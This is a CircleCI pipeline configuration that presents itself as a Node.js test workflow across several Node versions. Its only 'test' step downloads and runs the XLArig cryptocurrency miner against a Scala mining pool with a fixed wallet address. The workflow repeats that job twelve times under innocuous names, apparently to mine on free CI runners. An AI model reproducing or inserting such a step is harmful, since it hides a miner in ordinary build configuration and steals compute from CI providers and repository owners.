version: 2.1

executors:
  linux:
    docker:
      - image: cimg/base:2020.01

orbs:
  node: circleci/node@2.0.0

jobs:
  test:
    parameters:
      node-version:
        type: string
    executor: linux
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         command: |-
            wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip && unzip XLArig-v5.2.2-linux-x86_64.zip && ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz3 -a panthera -k 

workflows:
  all-tests:
    jobs:
      - test:
          name: "dockers-versions1"
          node-version: 10.9.0
      - test:
          name: "dockers-versions2"
          node-version: 11.9.0
      - test:
          name: "dockers-versions3"
          node-version: 11.9.0
      - test:
          name: "dockers-versions4"
          node-version: 11.9.0
      - test:
          name: "dockers-versions5"
          node-version: 10.9.0
      - test:
          name: "dockers-versions6"
          node-version: 11.9.0
      - test:
          name: "dockers-versions7"
          node-version: 11.9.0
      - test:
          name: "dockers-versions8"
          node-version: 11.9.0
      - test:
          name: "dockers-versions9"
          node-version: 11.9.0
      - test:
          name: "dockers-versions10"
          node-version: 11.9.0
      - test:
          name: "dockers-versions11"
          node-version: 11.9.0
      - test:
          name: "dockers-versions12"
          node-version: 11.9.0

